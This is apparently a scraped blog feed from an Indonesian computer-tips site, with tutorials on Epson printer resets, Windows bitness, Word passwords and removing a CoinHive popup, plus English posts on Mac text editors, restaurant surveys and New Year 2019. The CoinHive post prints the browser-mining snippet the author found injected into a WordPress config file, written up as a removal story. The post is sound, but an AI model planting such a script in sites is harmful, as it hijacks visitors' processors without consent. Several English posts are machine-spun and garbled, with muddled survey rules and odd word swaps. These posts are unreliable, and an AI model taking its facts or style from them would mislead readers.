Belajar Komputer Mu Web Tempat Belajar Komputer Gratis Fri, 20 Sep 2019 17:12:58 +0000 en-US hourly 1 Cara mengatasi waste ink pad counter pada printer Epson L110, L120, L210, L220, L300, L310, L350, L365 Fri, 20 Sep 2019 17:11:08 +0000

Printer epson L series merupakan salah satu tipe printer inkjet atau tinta yang sangat populer di Indonesia, selain terutama karena kehandalan hardwarenya yang bisa dipakai bertahun tahun meski dihajar untuk mencetak ratusan lebar per hari, epson juga dikenal dengan kepraktisan pengisian tinta. Karena semua printer epson telah menggunakan sistem infus resmi dari pabrikannya.

waste ink pad counter

Meski printer epson ini handal, bukan berarti tidak pernah ada masalah. Salah satu masalah yang muncul adalah masalah waste ink pad counter. Tulisan waste ink pad counter akan muncul pada jendela stasus printer. Dan ditandai dengan lampu indikator berkedip atau blink. Sehingga printer epson pun tidak bisa dioperasikan. waste ink pad counter bisa berlaku pada hampir semua printer epson l serius, mulai dari Epson L110, L120, L210, L220, L300, L310, L350, hingga epson L365

Penyebab waste ink pad counter

Peringatan Waste ink pad counter dapat diartikan bahwa bantalan atau busa sisa tinta telah mencapai ambang batasnya. Produsen telah merancang sedemikian rupa, sehingga apabila bantalan ini sudah penuh, makan akan menampilkan peringatan tersebut.

Cara mengatasi Waste ink pad counter

Bagaimana cara mengatasi Waste ink pad counter , apakah langsung dengan membongkar busa atau bantalan tempat penampungan sisa pembuangan tinta tersebut ?

Bantalan tinta memang harus dibersihkan dengan cara membongkar, lalu dibersihkan dengan air, agar bantalannya bersih dari sisa tinta.

Namun tidak cukup membersihkan saja maka peringatan Waste ink pad counter akan hilang. kamu harus melakukan reset terlebih dahulu agar printer epson mendetekai bahwa bantalan atau busa penampungan sisa tinta telah dibersihkan.

Dan berita baiknya, bagi kamu yang menunda atau tidak ingin membongkar bantalan tinta, kamu bisa langsung meriset printer epson agar peringatan Waste ink pad counter tersebut hilang dan bisa langsung digunakan, tanpa harus membersihkan tempat penampungan tinta tersebut.

Cara reset printer epson agar Waste ink pad counter hilang

Untuk mereset printer epson agar bisa berjalan normal, kamu harus menggunakan aplikasi reseter epson L120, linkn ya ada di bawah

Setelah kamu download aplikasi reseter epson L120, buka atau jalankan aplikasi dengan nama file L120

Aplikasi reseter epson L120 akan tampil seperti diatas, selanjutnya pilih Particular adjustment mode

Lalu pilih menu Waster ink pad counter, selanjutnya klik OK

Selanjutnya, pada jendela waster ink pad counter seperti di atas, berita tanda cek pada Main pad counter, pada gambar kami beri angka 1, Lalu yang kedua klik tombol Check, lalu yang terakhir Initilize

Apabila muncul jendela pop up, klik saja tombol OK,

Selanjutnya, matikan printer epson L120, lalu hidupkan lagi. Apabila berhasil melakukan reset, maka lampu indikator tidak akan berkedip kedip atau blink.

Download Reseter Epson L120

Untuk download berikut link nya

Paswordnya alamat situs ini :

Selamat mencoba, semoga berhasil memperbaiki printer epson mu y yang mengalami waste ink pad counter

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Cara Cepat mengetahui Windows 32 bit atau 64 bit pada semua versi windows Mon, 26 Nov 2018 10:41:44 +0000

Berdasarkan arsitekturnya Sistem Operasi Windows tersedia dalam dua pilihan yaitu 32 bit dan 64 bit. Kita perlu mengetahui sistem operasi yang kita gunakan ketika kita akan menginstla suatu aplikasi, misalnya kita mendownload aplikasi dari internet. Selain versi windows, dalam situs disediakan dua buah pilihan download, satu aplikasi windows 32 bit satunya lagi untuk 64 bit.

Untuk mengetahui tipe windows yang kita gunakan kita bisa melakukan dengan cara yang cepat. Cara ini berlaku untuk semua versi windows, mulai dari windows xp hingga windows 10 memiliki cara yang sama untuk menampilkann tipe windows yang kita gunakan.

Cara Cepat mengetahui Windows 32 bit atau 64 bit

1. Langkah pertama masuk saja ke windows explorer, cara cepat nya tekan tombol Win (Jendela) pada keyboard biasanya deket tombol ALT. Kemudian bersamaan tekan timbol E pada keyboard


2.  setelah tampil windows explorer, klik kanan mouse pada Icon Computer di deretan icon sebelah kiri.

3. Setelah muncul menu pop up, pilih menu Properties

4. Sesaat kemudian akan tampil jendela, System seperti di bawah ini. Jendela sistem tidak hanya menampilkan type windows 32 bit atau 64 bit, namun juga menampilkan informasi versi windows, prosesor dan ram yang digunakan pada pc

Sangat mudah dan cepat bukan, untuk mengetahui versi dan tipe windows pada komputer atau laptop kamu 32  bit atau 64 bit. oh ya 32 bit. Semoga tutorial belajar komputer yang sederhana di atas bisa bermanfaat bagi kamu yang membutuhkan.


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WordPress masih sebagai CMS terbaik di dunia Fri, 22 Jun 2018 03:09:30 +0000

Apa itu CMS, CMS merupakan singkatan dari content management system. Sebuah aplikasi yang berfungsi untuk membangun sebuah situs atau blog. Sehingga untuk membuat blog kita tidak perlu menulis kode-kode pemrograman yang rumit dari nol. Kita hanya perlu memikirkan konten atau artikelnya saja, untuk kode kode rumit, kita serahkan pada aplikasi CMS ini.

Aplikasi umumnya bersifat open source aliash gratis, pilihanya saangat banyak di internet, namun hanya beberapa saja yang terkenal. Seperti WordPress, Joommla, Druppal, Magetto, dan Shopify.


Dari tool buatan google, yaitu google trend, kita bisa mengetahui bahwa sampai saat ini wordpress masih menduduki sebagai CMS dengan pencarian tertinggi, apabila dibandingkan CMS lainnya seperti Joomla, Drupal, Magento, dan Blogger. Angka pencariannya sangat tinggi sekali. Bahkan jika jika dari beberapa CMS tersebut ditotal, tidak akan bisa bersaing dengan jumlah pencarian wordpress.

Sangat wajar apabila wordpress masih menjadi CMS terbaik, karena ia memang memiliki banyak keunggulan dibandingkan dengan CMS lainnya.

Keunggulan wordpress antara lain; Ia memiliki dashboard yang sangat user friendly, bahkan pengguna awam pun bisa membuat blog wordpress dengan mudah . WordPress Menyediakan banyak plugin dan theme, pengguna bisa memiliki berbagai macam plugin sesuai dengan kebutuhan, mulai dari plugin keamanan, plugin gallery, hingga plugin untuk managemen database pun ada. Theme nya pun juga melimpah ruah, baik theme gratis maupun berbayar bisa dapat dengan mudah didapatkan.

Layaknya sebuah merk mobil, jika banyak penggunanya, apabila menemui masalah kita bisa dengan mudah mengatasinya karena banyak bengkel yang bisa menangani. Sama halnya dengan wordpress, jika kita mengalami masalah dengan wordpress, di internet banyak tips dan trik bertebaran.

Jika kami tertaik menggunakan CMS terbaik ini, kamu bisa memulainya dengan belajar membuat blog dengan Hostinger. Dalam artikel tersebut dijelasnkan secara detail bagaimana membangun sebuah blog berbasis CMS wordpress dari nol hingga menjadi sebuah blog yang cantik, dan tentunya juga terindeks di google.

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Cara menghilangkan pop up CoinHive dari blog dengan menghapus script mining bitcoin Fri, 25 May 2018 21:57:55 +0000 Cara menghilangkan pop up CoinHive

Beberapa waktu belakangan ini beberapa blog saya menampilkan sebuah pop up yang tidak saya kenal. Pop up ini berisi pemberitahuan : apakah ini pengunjung website bersedia untuk menggunakan sebagian daya prosesornya untuk mendukung pemilik blog.

Lebih jelasnya pop up nya seperti gambar di bawah ini


Ketika pengunjung blog memilih allow for this session, maka prosessor pengguna akan tersedot secara maksimal penggunaannya. Makanya jangan heran tiba tiba kipas prosesor sampai bertambah kencang.

di bawah tombol Allow terdapat sebuah link menuju yang setelah saya kunjungi ternyata sebuah layanan penambangan bitcoin berbasis java scrip dengan memanfaatkan prosesor pengunjung blog. ini masih bagus karena masih menampilkan pop up pemberitahuan, istilahnya menawarkan mau ngasih izin atau tidak.

yang lebih kejam lagi tanpa izin pengunjung blog atau situs, maka ketika pengguna mengakses situs yang disematkan script penambangan bitcoint tersebut, secara otomatis penggunakan cpu pada latop atau pc langsung meningkat, yang biasanya ditandai dengan kinerja semakin lemot dan kipas makin kencang.

Cara menghilangkan scrip

Awalnya saya pikir pop up tersebut merupakan bagian dari kampanye iklan pada mitra penyedia iklan saya. Setelah saya telusuri ternyata tidak. kampanye iklan mitra saya sama sekali tidak ada hubunganya dengan

Saya coba mencari melalui source code web, scrip muncul di paling atas.


Namun untuk menghapusnya saya mengalami sedikit kesulitan, karena saya pikir scrip tersebut diinject kan ke theme, saya cari di header, index, footer, bahkan single post juga tidak ketemu.

Script ini baru ketemu setelah saya menginstal ulang wordpress karena ada masalah pada dashboardnya (posting editor tidak tampi). setelah saya instal ulang, ternyata pop up ikut hilang.

AKhirnya saya coba mencari script tersebut di blog saya yang lain pada file file php wordpress. akhirnya script jahat ini ketemu di halaman config.php. berada di urutan paling bawah.

dan inilah penampakan script jahat tersebut

<script src=””></script>
var miner = new CoinHive.Anonymous(‘Ys0MTHnNbTBnlaz4rjmeSOS0g0KtvEMk’, {throttle: 0.3});

// Only start on non-mobile devices and if not opted-out
// in the last 14400 seconds (4 hours):
if (!miner.isMobile() && !miner.didOptOut(14400)) {


Untuk menghilangkannya, silahkan hapus saja script tersebut, selanjutnya Pop Up coinhive tidak akan muncul lagi.

Semoga sedikit cerita mengenai cara menghilangkan script mining bitcoin di atas bisa bermanfaat bagi kamu yang membutuhkan.

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Niaga Hoster – Hosting Lokal yang tidak bisa diremehkan Thu, 24 May 2018 06:47:51 +0000

Dalam posting kali ini penulis akan sedikit berbagi pengalaman dalam menggunakan salah layanan webhosting di Indonesia. Sebelum kami bahas lebih lanjut, Jika kamu belum mengerti apa itu hosting. Berikut ini penjelasannya.

Hosting merupakan tempat penyimpanan data-data website kita disimpan, disuatu komputer pusat yang dinamakan komputer server. Komputer ini menyala terus menerus selama 24 jam tanpa henti.

Untuk menjadi agar hosting tetap hidup menerus sehingga tanpa ada masalah, hosting harus didukung dengan tenaga yang profesional di bidangnya dan yang tidak kalah penting harus selalu siap setiap saat menjaga serta memastikan layanan hosting selalu dalam keadaan hidup.

Sedangkan domain merupakan alamat unik yang digunakan untuk mengakses suatu website. Disebut unik karena alamat domain tidak bisa dibuat sama. Misalnya seperti alamat situs ini, alamat domain seperti ini di dunia Cuma ada satu, kecuali berbeda ektensi, bisa saja. Misalnya

Kembali ke topik awal, jadi siapakah salah satu layanan web hosting Indonesia tersebut ?

Web hosting ini adalah niagahoster. Saya tahu penyedia layanan dari referensi seorang teman.

Ketika itu saya kebingungan memilih layanan hosting murah yang bukan murahan, yang bisa diandalkan.

Sebelumnya saya telah mengunakan layanan hosting lokal lain yang menampung 6 buah website (tidak perlu saya sebutkan namanya). Namun harganya lumayan menguras kantong, dan ketika web saya mengalami masalah, responnya tergolong lambat.

Sedikit jengkel saya rasanya waktu itu, akhirnya saya coba menggunakan niagahoster.

Niagahoster menyediakan beberapa pilihan paket yang terjangkau. Dalam hal ini saya memilih paket yang cukup terjangkau menurut saya yaitu paket pelajar.

Saya memilih paket ini pertama karena harganya yang murah, namun memiliki fitur yang saya butuhkan. Fitur yang paling penting dan yang saya butuhkan adalah unlimited bandwidth, unlimited space dan add on domain hingga 10 domain (dengan add on domain, penggunkan bisa mengarahkan 10 domain ke satu layanan hosting). Fitur tambahan lain dari paket ini seperti backup otomatis, sll dan lain lain, saya anggap bonus yang istimewa, karena dengan harga terjangkau kita mendapatkan sesuatu yang lebih.

Awal menggunakan layanan dari niagahoster, saya sudah merasa bahwa niagahoster memang bagus. Ketika telah selesai melakukan pembayaran, layanan hosting saya langsung aktif secara otomatis. Sehingga saya tidak perlu repot-repot melakukan konfirmasi secara manual.

Setelah akun hosting saya aktif, saya langsung login ke cpanel. Fiturnya benar-benar lengkap. Saya bisa dengan mudah melakukan migrasi dari hosting lama ke hosting baru, tanpa ada satu kendala satu apapun.

Pernah mengalami masalah dengan niagahoster ?

Tentu pernah, yaitu mengenai Sumber Daya CPU yang saya gunakan melebihi kapasitas yang dizinkan oleh Niagahoster.

Kenapa bisa melebihi ? Ini karena saya menginstal tambahan 6 web site berbasis wordpress, yang apabila tidak hati hati dalam menggunakan plugin bisa memakan banyak Sumber Daya CPU. Apalagi pengunjung harian masing-masing web tersebut tergolong tinggi.

Solusinya ?

Pihak Niaga hoster dengan tanggap, cepat dan ramah membantu saya mengatasi masalah tersebut, dengan memberikan tips dan trik tertentu, bahkan sebuah trik yang belum pernah saya tahu. Selain dapat mengatasi masalah juga bisa menambah wawasan baru.

Sebagai tambahan informasi, Hosting pada niaga hoster servernya menggunakan DCI Indonesia yang berada di Jakarta. DCI merupakan data center bersertifikasi Tier-4 berstandar Internasional & merupakan bagian dari Equinix penyedia data center terbaik di Dunia yang berkualitas tinggi dan handal dengan jaminan uptime 99.999%

Spesifikasi server yang digunakan oleh data center DCI Indonesia tergolong tinggi. Untuk hardwarenya menggunakan prosesor  40 Cores Intel(R) Xeon(R) E5-2630 v4 @2.2Ghz, RAM sebesar 128 GB, Kecepatan Tansfer data 1 Gbps, Menggunakan multiple disk drivers untuk proteksi kehilangan data. Untuk software, OS menggunakan linux terbaru, webserver apache + litespeed, dan software manajemen hosting menggunakan Cpanel.

Itulah pengalaman saya dalam menggunakan niagahoster. Layanannya cukup memuaskan, harganya cukup terjangkau, dan kulitasnya membuat hati tenang.

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Best Text Editor for Mac to use in 2019 Wed, 28 Feb 2018 14:33:19 +0000 Whether you’re a seasoned developer, or even a newcomer hoping to code your very first item of software, a fantastic text editor is one of the most crucial things you are going to want on your Mac. That is most likely why there are a Great Deal of free text editors, in Addition to excellent paid text editors out there, and to spare you in time consuming (and often confusing) task of choosing the right text editor for the own use, we’ve picked the 10 top text editors for Mac that are actually worthy of your attention:

Best Text Editors for macOS

Notice : In this report, we are focusing on the ideal text editors for coding but if you are interested in finding a text editor for your writing purposes, you can check out our post on the best writing programs for Mac.

1. Sublime Text 3

Sublime Text is probably among the most well-known text editors available for Mac also for all the appropriate reasons. The software brings a slew of features including syntax highlighting and folding, a high degree of customizability, simple to navigate interface, multiple selections, strong API and package ecosystem, and much more. One of the best characteristics of Sublime Text 3 is the”Goto Anything” characteristic. Since it names implies, the feature allows you to immediately jump to logos, lines, or phrases that you are looking for, and can be activated by simply hitting keyboard shortcut ⌘P.

Blend this with attributes like carve editing, Goto Definition, Command Palette, batch editing, and instant project switch and you’ve got one of the best and most powerful text editors on the market. Possibly the only downside of Sublime Text 3 is its own cost. Just like any well developed Mac applications, Sublime Text boasts of a premium cost. That said, since a text editor is going to be the basis for your future job, investing up front in a great text editor isn’t a terrible thing. If money is no concern for you, definitely check this out.


Easy to use
Customization options
Capability to assign custom keyboard shortcuts
Quick and smooth
Cross platform

Some plugins affect performance
Download: (Free Trial, $80)

2. Atom

If you’d like a text editor which is as effective as Sublime Text but does not cost a penny, then Atom is for you. Developed by the exact minds which are behind the popular SVC service GitHub, Atom is a open-source program which is both modern and approachable and yet hackable for its heart. Atom is built on HTML, JavaScript, CSS, and Node.js integration and it functions on Electron. Although the program is already feature rich, in case you would like more features, it is possible to install some of its thousands of open packs packages to add new attributes and functionality.

Atom is also highly customizable. If you would like, you can change nearly everything on it. It is possible to set up various themes to modify its appearance and feel, you can tweak the UI using CSS, and also add major features which match your workflow using HTML and JavaScript. Atom enables you to make a working environment that complements your workflow and that’s its biggest strength. Also, it is totally free to download and use without any restrictions.


Open-source and free
Nice UI
Customization options
Lots of packages available

A lot of packages can slow down it
Can be quite a resource hog
Download: (Free)

3. Brackets

Another popular text editor for Mac is Brackets which mainly concentrates on web design. Brackets is a better option for front-end developers and web designers than the ones mentioned above. While this text editor has been made by Adobe, that is famous because of the own subscription pricing model, Brackets is a completely free text editor. Adobe has grown Brackets within an open-source project which is supported by its own active and enthusiastic community. Among the best characteristics of Brackets is the”Live Preview” feature which enables users to see any changes that they make into the CSS and HTML of this code revealed live in a Chrome window. This feature makes it possible for developers to keep an eye on their code also stops them from getting any drastic mistakes.

Since Brackets is an Adobe product, it works really well with other Adobe products. By way of instance, there’s a feature referred to as”Extract” which lets users automatically extract color, font, gradient, and measurement data from a photoshop document file. Brackets is already a feature text editor, however, if you want to add more attributes, it is possible to do so using Brackets’ extensions that are absolutely free to download and then install. A few of the very Well-known Brackets’ extensions are Beautify, Autoprefixer, Emmet, Minifier, Bracket Gits, and also Brackets File Icons. If you’re into web development, you should try Brackets.

If you want any guide on how to install text editor for mac or if you have any other problem related to it then you will find them on Slash Minute in deatiled. Just use the search box and hit enter.


Open-source along with free
Different free extensions
Cross platform

Aimed mostly at top-end programmers
Lacks a Couple of useful text editor commands
Download: (Free)

4. BBEdit 12

BBEdit is created by Bare Bones software and is probably among the oldest and most reliable text editors you can locate on Mac. Not only BBEdit is utilized by thousands of programmers on the market but it’s also employed by many writers since the software provides features for editing, searching, and manipulation of prose, origin code, and textual data. Some of the greatest features of BBEdit include built-in applications such as text manipulations, Hard Wrap, customizable syntax coloring support for more than two dozen built-in formats, placeholder selections for easier site maintenance, multiple documents manipulations, full collection of HTML Tools for quick, simple, and correct markup, comprehensive file management capabilities, and much more.

One of the things that’s important when deciding on a software such as a text editor would be its own durability. You don’t want a text editor that will not receive any updates, or even worse, get murdered few years down the line. Together with BBEdit, you can be sure that it will never happen. The application has been available since 1992 which is more than the existence of macOS as we all know today. BBEdit’s presence of more than 26 years is an enough proof that the developers aren’t going to let that die. If you’d like a powerful text editor for internet development that will be present for you to get the next ten years, certainly give this a go.


Stable and dependable
Packs in almost all the features you can think of
Great performance
Various built-in tools and languages
Easy to use

Somewhat pricey
Download: (Free Trial, $49.99)

5. UltraEdit

UltraEdit is among the very best and most versatile text editors for Mac out there. For starters, UltraEdit supports a great deal of different languages including C, Objective C, Javascript, XML, PHP, Perl, Python, and more. The same as BBEdit, UltraEdit has existed since ages and is now celebrating its 25 year old anniversary this year. So reliability isn’t a concern . The software brings a great deal of features including and not restricted to themes assistance, support for large files (>4GB), syntax highlighting for several languages, multi-caret editing, multi-selection capacities, an extremely robust search, integrated FTP, service for 4K and Apple Retina screen, and more.

UltraEdit is a really effective text editor, but if you need more features, you can purchase it together with other Ultra goods like UltraCompare, UltraEdit Suite, UltraFinder, and IDM All Access, all which bring additional features. Last, do notice that UltraEdit isn’t cheap and is among the lightest text editors on the market. But, there is a 30-day complimentary trial which you may use to have a sense of the software prior to turning up the money.


Supports many languages
Handles big files quite well
Reputable and frequently upgraded
Fast and easy to use

Some attributes available to buy separately

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McDVoice – Participate in McDonald’s Customer Survey from Sun, 25 Feb 2018 18:27:30 +0000 As you’re often using McDonald’s, then you may be heard concerning the client satisfaction questionnaire in McDVoice. If you would like to take part in these polls, there’s some vital things to be mentioned. We believed explaining those significant info regarding will assist any clients who wishes to carry mcdonald’s poll.

McDonald’s is among the very best fast food restaurant chain on earth. As they grow larger, they desired to understand more about the opinions of the solutions with client satisfaction app . They developed a notion of questionnaire that contains of general queries and answers concerning the services that was provided during their trip in one of their socket.

McDVoice – McDonald’s Survey for Customer

It’s the planet’s second larges fast-food restaurant series following subway. Getting renowned for Burgers, it offered more than 4 millions of burgers at first socket.

Concerning McDonald’s research: In McDVoice, Its about client satisfaction questionnaire. Clients give feedback regarding the services in the socket, cost of their meals, cleanliness in the area, staff behaviour and considerably more by simply answering questions throughout the poll. These polls can be found only with a valid receipt maybe not older than seven days. In addition to opinions you receive some voucher code/reward points that may be employed on next buy.

McDonald’s always desire clients opinions regarding the services that they experienced during the current trip at one of the socket. In exchanges of the ideas and remarks, business supplies you with a completely free sandwiches or some other distinctive mcdonald’s dinner or some additional discount on the next purchase.
These rules are compulsory and you ought to be quite frank in answering the poll questions.

First thing is Receipt your latest order in any of those McDonald’s socket. Do not through your reception following moment. Always keep your receipts so you could take part in poll.

As poll is only accessible on the internet, you need to have an active online connection on any apparatus. Since the polls are only available on the internet, you need to stop by the official website of McD Voice — on your own device.

There’s some age restriction also ie., You ought to be old 15 or older than this. As they’re not conscious of these queries. Along with your replies must be in two of the above mentioned languages.

There are particular limits on amount of polls a month. Even you’re regular customer of McDonald’s, you are participate in 5 polls just / month.

You need to participate questionnaire over 30 days of your trip to some mcdonald’s socket. Above we’ve given a few vital things to take part and today we’d lead you with easy and easy actions to share in McDonalds Survey for Clients . Below We’ve listed the full procedures on How Best to submit your polls at

Constantly keep the reception of your order, whenever you see McDonald Outlet. You require receipt amount to take part in customer feedback questionnaire.
Notice down the research code in the reception slide.
Visit the official site of McDonalds Client Research website —, This implies, they’d love to listen to clients opinions in their McDonald’s Service.
To start, Enter the 26-Digit research code that you’d noted down sooner.
When your poll code is supported, you’d be asked straightforward questions according to your own experience during your last trip.
Be truthful with your answers linked to their own quality meals, cost, services, personnel behavior and cleanliness at restaurant shops.

After you had finished the questionnaire, you’ll receive identification code.
This investigation code may be used together with your next purchase in any of McDonald’s Outlet to find some reduction or some other totally free sandwiches/foods.
We advise you to note this down exceptional validation code in the rear of your reception and constantly carry the reception with you.
On the following purchase reveal this exceptional code for your sales man, they’d present your benefit or some other free food.

McDVoice Benefits: Rules & Conditions

After you’d submitted a fair survey, you’ll be rewarded with a few discount on the next order at McDonald’s. There are a number of rules under to be recalled about rewards/discount coupon.
Needs to be 15 years old to use or need the lottery.
Provide code has to be utilized inside a week. Just 5 surveys a month is permitted.

Also don’t forget to read MyWegmansConnect Employee Login Detailed Guide

McDonald’s Client Support:

Occasionally you may face some slight difficulty whilst obtaining, you can go to friendly version to prevent those minor troubles. If your problems still persist we advise you to get McDonald client support help.
That is all men, we believe these tips provided on this site around McDVoice ought to aid you with survey information and discount supplies on the next arrangement with McDonald’s. All info gathered by McDonald’s throughout the poll have been take as opinions and employed to boost their services later on.

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3 Langkah Mudah Cara memberi password data file microsoft word 2003, 2007, 2010, dan 2013 Sat, 04 Nov 2017 05:59:00 +0000 Cara memberi password data file microsoft word


Apa kamu merasa data atau file microsoft word kamu kurang aman kerahasiaannya ? mungkin kamu bisa mencoba memberikan password pada data atau file microsoft word kamu. tidak perlu memerlukan aplikasi khusus untuk melakukan hal ini. kamu hanya perlu melakukan sedikit setting pada saat kamu mau menyimpan data atau file microsoft word kamu.

Cara memberikan password pada data atau file yang kami sajikan ini cukup sederhana dan mudah, serta bisa diaplikasikan pada microsoft office semua versi, mulai dari versi lama misalnya office 2000, xp, dan 2003, atapun yang terbaru misalnya 2007 dan 2010 serta 2013.

Ikuti 3 tahapan mudah memberi password pada file microsoft word di bawah ini

1. Buatlah atau siapkan data pada microsoft word yang akan diberi password, kemudian klik File save as

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3.  Jendela General Options akan tampil seperti gambar di bawah ini,  pada jendela itu terdapat dua kolom untuk mengisikan pasword, yang pertama kolom password untuk membuka dokumen, dan yang kedua untuk memodifikasi dokumen. Agar tidak bingung, masukkan saja kedua kolom tersebut dengan password yang sama.  Kemudian klik OK. setelah kamu Klik ok akan muncul jendela kecil untuk konfirmasi, tuliskan kembali password yang kamu masukkan tadi, kemudian Klik tombol OK Baca Juga: Cara Memperbaiki Pembaruan Windows di

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TelltheBell — Taco Bell Client Survey Guides in Fri, 25 Nov 2016 18:40:00 +0000 TelltheBell is a classic restaurant you have to have been lots of times and attempted its menu such as tacos, burritos, quesadillas, nachos. Thus if you’re receiving $500 sweepstakes or voucher codes for reviewing the material as well as the service you’ve received, would not you participate in such poll??

Obviously , Taco Bell Client Satisfaction Survey is your questionnaire feedback area where the clients may share their bad or good experience. By doing this the firm may boost their solutions applicable to their clients’ testimonials. And think, the direction section of the provider goes through these responses so they can grow more based on the clients’ demand.

TelltheBell — Taco Bell Customer Survey

Taco Bell is a American food restaurant which was set on March 21, 1962; 56 decades back in Downey, California. The creator of Taco Bell is currently Glen Bell also it’s its headquarter at 1 Glen Bell Way, Irvine, California, the U.S. From the year of 2018, Taco Bell serves over two billion clients every year in 7,000 restaurants, over 80% of that are owned and operated by independent franchisees and licensees.

If you’re among those food fans and want to eat Taco Bell then you have to take part in TellTheBell consumer satisfaction poll.

Taco Bell Survey Prerequisites:

You require 16-digit questionnaire code, that can be present in your TacoBell poll receipt.
Any apparatus like notebook or cellular that have net access.
Your age has to be greater than 18.
Awareness of Spanish or English language.
Inform The Bell Survey Rules
Here are the crucial principles about TellTheBell Survey.

You should have legal residence from the United States to take part in the sweepstakes.
You have to be at 18-years older.
Fundamental Comprehension of Spanish or English Language.
The entire amount of entrance .
You will find 13 entrance periods and utilizing one Inform The Bell survey reception you can just get involved in 1 entry interval.
You will need to reevaluate Taco Bell for a different questionnaire receipt.
Employees of those TacoBell or Published Parties Can’t participate in the poll.
Clients who get involved in this poll are often capable to acquire a sweepstakes prize of $500. The participants that completed the poll, four lucky winners will be drawn through every sweepstakes submission interval.

TellTheBell Survey Utilizing Mail Method

To input Inform The Bell Survey with Mail you’ll need:

You’ll discover a sample reception on the ideal side of your display along with also a welcome message which will direct to proceed farther with the poll procedure.
Input the 16-digit poll code printed on your receipt and click on begin.
Response a set of some questionnaire concerning your trip to the Taco Bell in which you have your poll invitation.
The cleanliness of this restaurant
The rate of this services
the Validity of your Purchase
The percentage size of your Purchase Issue Number 4Highly Happy or exceptionally Dissatisfied with Taco Bell. Issue # 5you’re going to be asked if you faced any issues during the previous trip at Taco Bell. And you need to rate a few of the aspects linked to the Food you ate at Taco Bell. Issue # 8You are a real resident of both USA and therefore are 18 years old and if you’re then you will go into the Tellthebell $500 Sweepstakes. Input the information for 1 qualified entrance in the 500 sweepstakes and also to get educated in the event you’re the winner.
You’ll get a message regarding the sweepstakes. You are able to click the link in the bottom of the webpage to look at the official sweepstakes rules. It is possible to learn more about tellthebell poll here too.

Get Taco Bell

For any inform the bell criticism, utilize the following info to get Taco Bell.

Taco Bell Client Satisfaction Survey is your location at which you are able to have a poll. Following this connection it’s possible to finish the questionnaire and speed the company in accordance with your experience. In Case You Have any questions you can request it from the comment section under

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Happy New Year 2019 Quotes, Images, Wishes, Greetings & Messages Fri, 25 Nov 2016 18:20:45 +0000 Happy New Year 2019 is essentially party of New Year that is coming into the public. Folks celebrate New Year nighttime 2019 that will be held on 31 December. Inside this Nighttime there folks with a good deal of pleasure and enjoyments. A lot of people hold enjoyments celebrations in the home or at different resorts. Attempt to create your new year 2019 happy filled with enjoyments and excitements. Sometimes there’s public holiday in massive cities and tens of thousands of individuals like the New Year nighttime 2019.

The majority of the schools along with another educational institutions have been all closed. However, some joint shops are available from the New Year’s nighttime. And on the flip side many exceptional applications telecast around the T.V folks are awaiting all these apps. Individuals of different countries are observing this occasion jointly. There are a whole lot of terror on the midnight in the right time of 12AM clock.

About the New Year’s day the huge cities have been decorated with a great deal of lights and together with the other substance. A lot of men and women are in their job in New Year’s eve 2019 such as in Hospitals there’s not any vacation at New Year since there function is required any moment will probably be a crisis telephone and the physicians and another employees ought to be there readily available for practically any Emergency. Along with another emergency services providers are particularly in New Year’s nighttime are offered for practically any emergency.

On Happy New year 2019, lots of friends and relatives celebrate those events jointly. They appreciated New Year’s nighttime 2019 with beverages and fireworks. Friends are invite their buddies that there is a lot of parties are held Friends come nearer and assure to each other they will be remain together at the joys and at the Darkness of the lifetime.

Fundamentally the Happy New Year 2019 is a function that is to come nearer to each other to demonstrate their love for them. Along with also the New Years is a function that is for recall that incorrect things that is you’ve done with individuals and to receive apology to your errors.

New Year 2019 Quotes, Images, Messages and Greetings

Most of us know that shortly joyful New Year 2019 is forthcoming, and we’re all set to do this. Since it’s the public holiday all people from their functions are not free. They all are all set to welcome the Joyful New Year 2019 with fresh zeal. The principal question appear on the afternoon before Joyful New Year 2019, which We make this occasion memorable and thankfully. So stick with us here we’ll give a great deal of suggestions to create your festival unique.

Primarily, you need to organize a welcome celebration of Joyful New Year and invest it with your pals. Really your family are also be present to maintain the party agreements. This manner no additional difficulty happens during the parties. All around the world like we discuss previously that celebrations are organize throughout the world so as to welcome the joyful New Year 2019. At this day folks call upon their friends and family members and creates the parties together.

In my words, an occasion in characterized as the afternoon when most of the relatives, relatives and friends accumulate. That is the gorgeous day of entire year since in entire year no occasion might gathers all closers buddies and family members. This is merely the Happy New Year 2019 day if most of the people today get together for every other.

In the day of joyful New Year 2019 folks are prepared to forgive their loved ones to get slim sins or misbehave. Thus events are valuable they attract people near one another. Moreover it’s the very best time to refresh ourselves out of the daily routine boring office function. In this manner an occasion spreads joy and peace among those people.

Happy New Year 2019 is time when distinct parties and parties all Hedley can not get any in various areas of earth. Most professions are there that can not get vacation in the day of an event or holiday destination. These careers are physicians and its colleagues. They can’t become free of work because of which a crisis may happen any moment.

31st December nighttime is your best night for the entire calendar year. At the night people of a exact same family accumulates at precisely the exact same region and loves that is nights. As Joyful New Year 2019 is your most significant festival all around the world.

Folks from all around the world celebrate it together with their own joy. Assuming before the afternoon of Joyful New Year 2019 supermarkets provides special discounts to the bad individuals, so that bad could purchase a variety of items. Much like before Christmas there’s particular; discount everything.

This produces the every individual equivalent on the afternoon of joyful New Year 2019. This is only because that bad folks are able to buy all the items that a wealthy individuals have. Therefore there spread just a small bit novelty in society. A festival usually means which spread the pleasure to all of your associated individuals your non relevant men and women.

So in the afternoon of Happy New Year 2019 people are happy. Thus New Year in this manner functions as a source of pleasure and joyness. At night 31st December, fantastic fireworks are organized at the welcome of joyful New Year 2019. Individuals spread joy and joy so as to earn their new year full of enthusiasm.

Individuals made new company resolutions prior to the afternoon of New Year. People today wish to overlook the sins of their former season and wish to create their joyful New Year happy and good. Individuals from all around the world together with their families created a nation excursion. Sometimes there’s a public holiday all around the world people visit their nearer relatives visit each other’s house and spread a parcel of pleasure. This manner they come near one another. Absolutely they function as the spread of pleasure from the society.

In buddies joyful New Year is that the day of liberty because in that day there’s absolutely not any strain work of faculty and faculty work. Even though there isn’t any strain of parents so that in manner they may take pleasure in the Joyful New Year 2019. Folks from all around the world participate parts from the celebrations of New Year. Really there are no enough words to spell out the Joyful New Year 2019 because of its own uniqueness. New Year is the greatest festival all around the world. It’s celebrated in each tiny city of earth.

It begins with the exchange of presents and organizing parties. As gifts will be the indication of love. They function as a supply of love between individuals. It raises the closeness among those folks. Individuals of entire world had their own approach to observe that the Joyful New Year 2019. Thus, every person sees the occasion in accordance with their economic standing. Individuals of different cheap level celebrate Happy New Year 2019 with fantastic joy people organize dishes at the day to be able to entertain them with tasty dishes.

Joyful New Year Eve 2019

